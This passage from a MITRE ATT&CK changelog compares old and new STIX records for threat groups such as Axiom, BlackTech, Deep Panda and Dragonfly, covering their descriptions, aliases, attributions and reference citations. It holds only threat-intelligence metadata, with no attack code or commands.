| external_references[5]['description'] | AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021. | CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021. |
| external_references[5]['url'] | http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf | https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/ |
| external_references[6]['source_name'] | TrendMicro New Andariel Tactics July 2018 | FSI Andariel Campaign Rifle July 2017 |
| external_references[6]['description'] | Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021. | FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021. |
| external_references[6]['url'] | https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html | https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do |
| external_references[7]['source_name'] | CrowdStrike Silent Chollima Adversary September 2021 | IssueMakersLab Andariel GoldenAxe May 2017 |
| external_references[7]['description'] | CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021. | IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021. |
| external_references[7]['url'] | https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/ | http://www.issuemakerslab.com/research3/ |
| Old Description | New Description |
|---|---|
| [Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) | [Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:52:38.226000+00:00 | 2022-04-15 15:52:00.359000+00:00 |
| description | [Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) | [Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) |
| external_references[1]['source_name'] | Axiom | Group 72 |
| external_references[1]['description'] | (Citation: Novetta-Axiom) | (Citation: Cisco Group 72) |
| external_references[2]['source_name'] | Group 72 | Axiom |
| external_references[2]['description'] | (Citation: Cisco Group 72) | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | Novetta-Axiom | Cisco Group 72 |
| external_references[3]['description'] | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. | Esler, J., Lee, M., and Williams, C. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016. |
| external_references[3]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | http://blogs.cisco.com/security/talos/threat-spotlight-group-72 |
| external_references[5]['source_name'] | Kaspersky Winnti June 2015 | Novetta Winnti April 2015 |
| external_references[5]['description'] | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. |
| external_references[5]['url'] | https://securelist.com/games-are-over/70991/ | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf |
| external_references[6]['source_name'] | Novetta Winnti April 2015 | Novetta-Axiom |
| external_references[6]['description'] | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. |
| external_references[6]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf |
| external_references[7]['source_name'] | Cisco Group 72 | Kaspersky Winnti June 2015 |
| external_references[7]['description'] | Esler, J., Lee, M., and Williams, C.. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016. | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. |
| external_references[7]['url'] | http://blogs.cisco.com/security/talos/threat-spotlight-group-72 | https://securelist.com/games-are-over/70991/ |
| x_mitre_version | 1.2 | 2.0 |
| Old Description | New Description |
|---|---|
| [BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017) | [BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 17:57:07.909000+00:00 | 2022-04-06 13:14:27.477000+00:00 |
| description | [BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017) | [BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020) |
| external_references[1]['source_name'] | TrendMicro BlackTech June 2017 | Palmerworm |
| external_references[1]['description'] | Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020. | (Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021) |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Palmerworm | |
| external_references | {'source_name': 'TrendMicro BlackTech June 2017', 'description': 'Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.', 'url': 'https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/'} | |
| external_references | {'source_name': 'IronNet BlackTech Oct 2021', 'description': 'Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.', 'url': 'https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape'} | |
| external_references | {'source_name': 'Reuters Taiwan BlackTech August 2020', 'description': 'Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.', 'url': 'https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK'} | |
| external_references | {'source_name': 'Symantec Palmerworm Sep 2020', 'description': 'Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt'} | |
| x_mitre_contributors | Hannah Simes, BT Security |
| Description |
|---|
| [Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 21:53:00.909000+00:00 | 2022-03-25 19:35:55.074000+00:00 |
| Description |
|---|
| [Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 19:34:36.092000+00:00 | 2022-07-22 18:37:22.178000+00:00 |
| Old Description | New Description |
|---|---|
| [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015) | [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 12:32:58.912000+00:00 | 2022-08-08 21:29:36.462000+00:00 |
| description | [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015) | [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015) |
| external_references[2]['source_name'] | ClearSky CopyKittens March 2017 | ClearSky Wilted Tulip July 2017 |
| external_references[2]['description'] | ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017. | ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. |
| external_references[2]['url'] | http://www.clearskysec.com/copykitten-jpost/ | http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf |
| external_references[3]['source_name'] | ClearSky Wilted Tulip July 2017 | ClearSky CopyKittens March 2017 |
| external_references[3]['description'] | ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. | ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017. |
| external_references[3]['url'] | http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf | http://www.clearskysec.com/copykitten-jpost/ |
| x_mitre_version | 1.5 | 1.6 |
| Description |
|---|
| [Darkhotel](https://attack.mitre.org/groups/G0012) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://attack.mitre.org/groups/G0012) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft Digital Defense FY20 Sept 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 17:37:58.136000+00:00 | 2022-10-19 22:07:30.243000+00:00 |
| external_references[3]['source_name'] | Kaspersky Darkhotel | Securelist Darkhotel Aug 2015 |
| external_references[3]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014. | Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018. |
| external_references[3]['url'] | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf | https://securelist.com/darkhotels-attacks-in-2015/71713/ |
| external_references[4]['source_name'] | Securelist Darkhotel Aug 2015 | Kaspersky Darkhotel |
| external_references[4]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018. | Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014. |
| external_references[4]['url'] | https://securelist.com/darkhotels-attacks-in-2015/71713/ | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf |
| external_references[6]['source_name'] | Microsoft DUBNIUM June 2016 | Microsoft DUBNIUM July 2016 |
| external_references[6]['description'] | Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021. | Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021. |
| external_references[6]['url'] | https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/ | https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/ |
| external_references[8]['source_name'] | Microsoft DUBNIUM July 2016 | Microsoft DUBNIUM June 2016 |
| external_references[8]['description'] | Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021. | Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021. |
| external_references[8]['url'] | https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/ | https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/ |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://attack.mitre.org/groups/G0009). (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) [Deep Panda](https://attack.mitre.org/groups/G0009) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine) Some analysts track [Deep Panda](https://attack.mitre.org/groups/G0009) and [APT19](https://attack.mitre.org/groups/G0073) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 13:49:09.605000+00:00 | 2022-07-20 20:10:29.593000+00:00 |
| external_references[7]['url'] | https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/ | https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/ |
| external_references[8]['source_name'] | ThreatConnect Anthem | Symantec Black Vine |
| external_references[8]['description'] | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. | DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016. |
| external_references[8]['url'] | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ | https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf |
| external_references[10]['source_name'] | Symantec Black Vine | ICIT China's Espionage Jul 2016 |
| external_references[10]['description'] | DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016. | Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018. |
| external_references[10]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf | https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/ |
| external_references[11]['source_name'] | ICIT China's Espionage Jul 2016 | ThreatConnect Anthem |
| external_references[11]['description'] | Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018. | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. |
| external_references[11]['url'] | https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/ | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ |
| Old Description | New Description |
|---|---|
| [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) | [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf | |
| external_references | https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector | |
| external_references | https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 22:07:18.072000+00:00 | 2022-10-19 22:09:02.443000+00:00 |
| description | [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) | [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017) |
| external_references[1]['source_name'] | Dragonfly | DYMALLOY |
| external_references[1]['description'] | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) | (Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[2]['source_name'] | TG-4192 | Berserk Bear |
| external_references[2]['description'] | (Citation: Secureworks IRON LIBERTY July 2019) | (Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[3]['source_name'] | Crouching Yeti | TEMP.Isotope |
| external_references[3]['description'] | (Citation: Secureworks IRON LIBERTY July 2019) | (Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021) |
| external_references[4]['source_name'] | IRON LIBERTY | Crouching Yeti |
| external_references[4]['description'] | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019) | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[5]['source_name'] | Energetic Bear | IRON LIBERTY |
| external_references[5]['description'] | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019) | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[6]['source_name'] | Symantec Dragonfly | TG-4192 |
| external_references[6]['description'] | Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[7]['source_name'] | Secureworks IRON LIBERTY July 2019 | Dragonfly |
| external_references[7]['description'] | Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020. | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[8]['source_name'] | Symantec Dragonfly Sept 2017 | Energetic Bear |
| external_references[8]['description'] | Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[9]['source_name'] | Fortune Dragonfly 2.0 Sept 2017 | CISA AA20-296A Berserk Bear December 2020 |
| external_references[9]['description'] | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. | CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021. |
| external_references[9]['url'] | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ | https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions |
| external_references[10]['source_name'] | Dragos DYMALLOY | DOJ Russia Targeting Critical Infrastructure March 2022 |
| external_references[10]['description'] | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. | Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022. |
| external_references[10]['url'] | https://www.dragos.com/threat/dymalloy/ | https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical |
| external_references[11]['source_name'] | Secureworks MCMD July 2019 | Dragos DYMALLOY |
| external_references[11]['description'] | Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. |
| external_references[11]['url'] | https://www.secureworks.com/research/mcmd-malware-analysis | https://www.dragos.com/threat/dymalloy/ |
| external_references[12]['source_name'] | Secureworks Karagany July 2019 | Fortune Dragonfly 2.0 Sept 2017 |
| external_references[12]['description'] | Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020. | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. |
| external_references[12]['url'] | https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ |
| x_mitre_version | 2.1 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | TEMP.Isotope | |
| aliases | DYMALLOY | |
| aliases | Berserk Bear | |
| external_references | {'source_name': 'Mandiant Ukraine Cyber Threats January 2022', 'description': 'Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.', 'url': 'https://www.mandiant.com/resources/ukraine-crisis-cyber-threats'} | |
| external_references | {'source_name': 'Secureworks MCMD July 2019', 'description': 'Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.', 'url': 'https://www.secureworks.com/research/mcmd-malware-analysis'} | |
| external_references | {'source_name': 'Secureworks IRON LIBERTY July 2019', 'description': 'Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector'} | |
